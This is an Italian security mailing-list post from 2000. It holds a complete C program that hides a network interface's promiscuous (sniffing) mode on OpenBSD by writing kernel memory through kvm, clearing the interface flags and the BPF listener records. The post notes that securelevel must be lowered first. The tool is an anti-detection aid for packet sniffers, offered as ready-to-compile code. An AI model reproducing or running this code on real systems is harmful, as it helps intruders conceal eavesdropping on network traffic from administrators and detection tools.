[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
[ Data: precedente | successivo | indice ] [ Argomento: precedente | successivo | indice ]
[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
Archivio: Maggio 2000 ml@sikurezza.org Soggetto: Oscurita' del promisc mode in OpenBSD Mittente: pig Data: 23 May 2000 07:55:57 -0000
ecco il prog che oscura il promisc mode in OpenBSD... le condizioni di validita' + o - le stesse di quelle x FreeBSD messe in bfi 8... Anche qui come nell'lkm dovete cambiare il securelevel per poter accedere su /dev/mem... e scriverci ... Il procedimento e' quello di coprire tutte le informazioni relative all'interfaccia promiscua sia nella struttura ifnet che nei descrittori di bpf... sperando che l'allframes bit dell'interfaccia di rete resti attivo il piu' possibile :) bye pig ----------------------------------------------- SoftProject - Digital Security for Y2K Sikurezza.org - Italian Security Mailing List DeadHead - Going where the water tastes like wine enwhay allway ethay ardscay areway ownday erethay'say othingnay eftlay otay eesay erethay'say ustjay ethay avementpay eftlay andway okenbray eamsdray.
/*
* Name: Promisc Mode Obscurity via kvm
* Date: May 23 03:46:51 2000
* Author: pIGpEN [ pigpen@s0ftpj.org, deadhead@sikurezza.org ]
*
* SoftProject Digital Security for Y2K
* Sikurezza.org Italian Security Mailing List
*
* COFFEE-WARE LICENSE - This source code is like "THE BEER-WARE LICENSE" by
* Poul-Henning Kamp <phk@FreeBSD.ORG> but you can give me in return a coffee.
*
* Tested on: OpenBSD 2.6 kern#0 i386
*
* cc obsd_obscura.c -lkvm
*/
#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <kvm.h>
#include <err.h>
#include <sysexits.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <net/if.h>
#include <net/bpfdesc.h>
#define Error(x) errx(EX_UNAVAILABLE, x);
struct nlist list[] = {
{"_ifnet"},
{NULL}
};
void
usage(char *arg)
{
printf( "OpenBSD - Promisc Total Obscurity\n"
"---------------------------------\n\n"
"Coded By pIGpEN / s0FtPj Y2k\n\n");
printf("%s <interface>\n", arg);
exit(0);
}
void
bpf_zero(kvm_t *kd, struct ifnet *ifp)
{
struct bpf_if ibpf;
struct bpf_d dbpf, *pdbpf;
int count = 0;
kvm_read(kd, (u_long) ifp->if_bpf, &ibpf, sizeof ibpf);
for(pdbpf = ibpf.bif_dlist; pdbpf; pdbpf = dbpf.bd_next) {
kvm_read(kd, (u_long) pdbpf, &dbpf, sizeof dbpf);
printf("#%d listener has %s promisc mode enabled",
++count, (!dbpf.bd_promisc) ? "no " : " ");
if(dbpf.bd_promisc) {
printf(" (changed)");
dbpf.bd_promisc = 0;
kvm_write(kd, (u_long) pdbpf, &dbpf, sizeof dbpf);
}
putchar('\n');
}
}
int
main(int argc, char **argv)
{
kvm_t *kd;
struct ifnet_head ifh;
struct ifnet ifc, *ifp;
if(argc != 2)
usage(argv[0]);
if(!(kd=kvm_open(NULL, NULL, NULL, O_RDWR, argv[0])))
Error("kvm_open()");
if(kvm_nlist(kd, list) == -1)
Error("kvm_nlist()");
if(!list[0].n_value)
Error("checking n_value");
kvm_read(kd, list[0].n_value, &ifh, sizeof ifh);
for(ifp = ifh.tqh_first; ifp; ifp = ifc.if_list.tqe_next) {
kvm_read(kd, (u_long) ifp, &ifc, sizeof ifc);
if(!strcmp(argv[1], ifc.if_xname)) {
printf("%s found ... promisc mode ", ifc.if_xname);
if(ifc.if_flags & IFF_PROMISC) {
printf("(found)\n");
if(ifc.if_pcount)
/* Like in FreeBSD version, you can do a
* perfect thing by decreasing for each
* descriptor found
*/
ifc.if_pcount = 0;
ifc.if_flags &= ~IFF_PROMISC;
kvm_write(kd, (u_long) ifp, &ifc, sizeof ifc);
printf("BPF Analysis for %s interface\n",
ifc.if_xname);
bpf_zero(kd, &ifc);
}else
printf("(not found)\n");
}else
printf("skipping -> %s\n", ifc.if_xname);
}
kvm_close(kd);
return 0;
}
[ Home | Liste | F.A.Q. |
Risorse | Cerca... ]
www.sikurezza.org - Italian Security Mailing List
(c) 1999-2005